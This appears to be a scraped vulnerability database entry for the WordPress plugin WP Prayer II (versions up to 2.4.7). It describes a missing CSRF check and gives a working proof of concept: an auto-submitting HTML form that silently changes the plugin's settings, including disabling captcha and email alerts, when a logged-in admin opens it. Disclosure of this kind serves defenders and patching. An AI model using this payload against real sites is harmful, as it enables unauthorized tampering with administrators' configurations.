Lucene search

K
wpexploitBob MatyasWPEX-ID:94F4CC45-4C55-43D4-8AD2-A20C118B589F
HistoryMay 24, 2024 - 12:00 a.m.

WP Prayer II <= 2.4.7 - Settings Update via CSRF

2024-05-2400:00:00
Bob Matyas
8
wordpress
csrf
vulnerability
settings update

6.6 Medium

AI Score

Confidence

High

0.0004 Low

EPSS

Percentile

9.1%

Description The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack

Have an admin open an HTML file containing:

```
<body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/edit.php?post_type=prayers&page=pray-settings" method="post" enctype="multipart/form-data">
        <input type="hidden" name="upr_no_prayer_per_page" value="9999" />
        <input type="hidden" name="upr_login_not_required_request" value="0" />
        <input type="hidden" name="upr_prayer_send_email" value="0" />
        <input type="hidden" name="upr_prayer_send_admin_email" value="0" />
        <input type="hidden" name="upr_prayer_default_status_pending" value="0" />
        <input type="hidden" name="upr_prayer_hide_captcha" value="0" />
        <input type="hidden" name="sitekey_gc" value="0" />
        <input type="hidden" name="secret_gc" value="0" />
        <input type="hidden" name="upr_prayer_show_country" value="0" />
        <input type="hidden" name="upr_time_interval_pray_prayed_button" value="0" />
        <input type="hidden" name="upr_prayer_thankyou" value="CSRF" />
        <input type="hidden" name="upr_prayer_fetch_req_from" value="all" />     
        <input type="hidden" name="prayerssettings" value="Update" />
        <input type="submit" value="submit">
    </form>
</body>

```

6.6 Medium

AI Score

Confidence

High

0.0004 Low

EPSS

Percentile

9.1%

Related for WPEX-ID:94F4CC45-4C55-43D4-8AD2-A20C118B589F